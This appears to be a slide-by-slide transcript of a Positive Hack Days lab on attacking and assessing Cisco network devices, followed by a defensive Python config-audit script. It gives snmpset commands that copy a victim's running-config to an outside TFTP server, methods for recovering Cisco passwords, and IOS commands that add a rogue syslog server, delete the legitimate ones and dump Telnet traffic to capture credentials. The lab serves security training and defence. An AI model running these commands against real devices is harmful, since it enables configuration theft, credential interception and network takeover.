Positive Hack Days. Pavlov. Network Infrastructure Security Assessment

A participant will acquire basic skills for finding vulnerabilities in switches and routers from various vendors. The master class covers both common network vulnerabilities and exceptional cases that can be found during security assessments of real networks.

Published in: Technology

1. Master class "Analysis of network infrastructure security". Sergey Pavlov, Positive Technologies

2. Introduction

3. Laboratory work
  • Scanning
  • SNMP default community strings
  • Management accounts for Telnet and SSH
  • Network device default settings
  • Event logging
  • VPN
  • Summary
4. Part 1. Scanning
  • Attackers always use scanning as the first step, to enumerate the services that are reachable
  • The information can be used to:
    • brute-force accounts and passwords
    • detect service versions

5. Practical task (1)
  • Start the virtual machine
  • Scan a specified port of the network device with Nmap.
6. Part 2: SNMP default community strings

7. SNMPv1/2
  • Privileges in SNMP
    • Read-only: this mode is used only to monitor the device, not to manage it.
    • Read-write is used both to monitor and to manage the device.
  • Here is an example of SNMP community string brute forcing with the SNSCAN utility (McAfee):

8. Copy the configuration file via SNMP to a TFTP server

    # Copy running-config from the device to the TFTP server
    # (row 666 of ccCopyTable: protocol tftp, source runningConfig, destination networkFile)
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <TFTP server address>
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
    # Row status 1 (active) starts the copy
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

    # Copy the configuration file back to the device (as startup-config)
    # (row 670: source networkFile, destination startupConfig)
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <TFTP server address>
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config
    snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1
    # Reload the device to apply the changes

9. Practical task (2)
  • Enable the TFTP server
  • Brute-force the SNMP password (community string)
  • Copy the configuration file to the TFTP server
10. Part 3. Management accounts for Telnet and SSH

11. Privilege types
  • Default privileges
    • The user has limited privileges (level 1) and can execute only basic commands
  • High privileges
    • The "enable" (level 15) password is needed to gain full privileges on Cisco devices

12. User password types
  • Without encryption
    • username cisco password 0 cisco
  • Weak encryption
    • username admin password 7 104F0D140C1953
      • A number of utilities recover it, for example Cain & Abel. Recovery takes a split second.
  • Password hash
    • enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0
      • Recovery requires brute force, using software such as Cain & Abel, PasswordPro, John the Ripper, etc. The recovery time is unpredictable.

13. Practical task (3)
  • Recover the "admin" user password
  • Recover the enable password
14. Part 4. Network device default settings

15. Examples
  • Often the device configuration includes default values. We do not notice them, but they exist ;)
    • If aaa new-model is enabled, the following values apply:
      • aaa authentication login default local – for vty
      • aaa authentication login default none – for con
    • The HTTP server does not depend on the "AAA" service and uses the "enable" password by default

16. Practical task (4)
  • Enter "AdMIn" instead of "admin" to log in to the device via Telnet
  • Log in to the device via HTTP using the enable password only
  • Create a new user via the web interface
  • Check that the new user can log in via Telnet
17. Part 5. Event logging. GOOD or BAD?

18. Event logging functions
  • Event logging helps to:
    • Troubleshoot faults in the network
    • Detect unauthorized access attempts
    • Track changes to configurations and devices
  • BUT! Event logging can also play a negative role:
    • By adding a new logging server to the configuration, an attacker receives the same data as the network administrator
    • The logging service makes it possible to intercept user accounts and passwords from the traffic passing through the device

19. Add a new event logging server
  • Add the new server
      MC#conf t
      MC(config)#logging 192.168.123.4
  • Delete the others... to prevent interference ;)
      MC#conf t
      MC(config)#no logging 1.2.3.4

20. Unable to catch traffic?! But if you really want to... you can
      MC#conf t
      MC(config)#logging trap 7
      MC(config)#access-list 122 permit tcp any any eq telnet
      MC(config)#end
      MC#debug ip packet 122 detail dump
  • New events are interesting, but the device's traffic is also interesting, especially unencrypted traffic. You can use undocumented Cisco IOS features.

21. Practical task (5)
  • Enable the logging server
  • Add the new logging server on the network device
  • Log the Telnet service traffic
22. Part 6. VPN

23. Why do I need VPN?
  • Only boundary devices are reachable from public networks without VPN.
  • VPN allows you to access services that are usually blocked by providers, for example 445/TCP.
  • Network devices do not support all popular services. For example, it is impossible to start an RDP session from a mobile device.

24. VPN types
  • GRE is a tunnelling protocol that does not provide encryption. Its main purpose is to encapsulate network-layer packets into IP packets.
  • L2TP is a tunnelling protocol that does not provide encryption or confidentiality by itself. It relies on an encapsulated protocol to provide confidentiality.
  • PPTP is a point-to-point tunnelling protocol. It allows tunnels to be created for data exchange.
  • IPsec allows you to authenticate and/or encrypt IP packets.

25. PPTP configuration example
      aaa new-model
      aaa authentication ppp default local
      vpdn enable
      !
      vpdn-group 1
      ! Default PPTP VPDN group
       accept-dialin
        protocol pptp
        virtual-template 1
       local name tunnel
      !
      interface Virtual-Template1
       ip unnumbered FastEthernet0/1
       ip mroute-cache
       peer default ip address pool default
       ppp encrypt mppe auto
       ppp authentication ms-chap
      !
      ip local pool default 1.1.1.10 1.1.1.100

26. Practical task (6)
  • Configure PPTP and connect to the device
  • Test whether host 1.1.1.1 is reachable
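As an added example, not part of the slides or of the Positive Technologies lab, the following Python audit flags in a saved running-config the weak settings discussed in parts 2 to 6: plaintext and type 7 user passwords, default SNMP community strings, the AAA-independent HTTP server, debug-level syslog export, syslog collectors outside an allowlist, and MS-CHAPv1 on the PPTP virtual template. The sample config reuses the slides' own values, and the APPROVED_SYSLOG allowlist is an assumption.

```python
import re

# Constructed sample running-config built from the values shown on the
# slides (not a real device's config); the snmp-server, logging trap and
# ppp authentication lines are assumed additions.
SAMPLE_CONFIG = """\
aaa new-model
aaa authentication login default local
username cisco password 0 cisco
username admin password 7 104F0D140C1953
enable secret 5 $1$1lSz$k.iGUgWvgxm27iJ/vaBfK0
snmp-server community public RO
snmp-server community private RW
ip http server
logging trap debugging
logging 1.2.3.4
logging 192.168.123.4
ppp authentication ms-chap
"""

# Assumed allowlist of the organisation's own syslog collectors.
APPROVED_SYSLOG = {"1.2.3.4"}


def audit_config(config, approved_syslog=APPROVED_SYSLOG):
    """Return (severity, config line, finding) tuples for weak settings."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        if re.match(r"username \S+ password 7 ", line):
            findings.append(("high", line, "type 7 password is reversibly encoded; use 'secret'"))
        elif re.match(r"username \S+ password (?:0 )?\S", line):
            findings.append(("high", line, "plaintext (type 0) password; use 'username ... secret'"))
        elif m := re.match(r"snmp-server community (\S+)(?: (ro|rw))?", line, re.I):
            if m.group(1).lower() in ("public", "private"):
                mode = (m.group(2) or "RO").upper()  # Cisco defaults to RO
                sev = "critical" if mode == "RW" else "high"
                findings.append((sev, line, "default community string; change it or move to SNMPv3"))
        elif line == "ip http server":
            findings.append(("medium", line, "HTTP server bypasses AAA login lists and accepts the enable password"))
        elif line in ("logging trap 7", "logging trap debugging"):
            findings.append(("medium", line, "debug-level syslog export ships debug output (e.g. packet dumps) to collectors"))
        elif m := re.match(r"logging (?:host )?(\d{1,3}(?:\.\d{1,3}){3})$", line):
            if m.group(1) not in approved_syslog:
                findings.append(("high", line, "syslog collector outside the allowlist; possible rogue receiver"))
        elif line == "ppp authentication ms-chap":
            findings.append(("medium", line, "MS-CHAPv1 on the PPTP template is weak; prefer ms-chap-v2 or a non-PPTP VPN"))
    return findings


if __name__ == "__main__":
    for sev, line, why in audit_config(SAMPLE_CONFIG):
        print(f"[{sev}] {line}  ->  {why}")
```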
27. Summary

28. Summary
  • Do not leave network devices without control: if compromised, they allow attackers to manipulate the whole network
  • Use best practices for network device security settings
  • Use comprehensive network device protection
  • Keep monitoring network security

29. Additional data and links
  • SNMPv1/2 scanning
    • SNSCAN
    • Hydra
  • Copy configuration via SNMP
  • PPTP configuration
  • BackTrack distribution

30. Thank you for your attention! [email_address]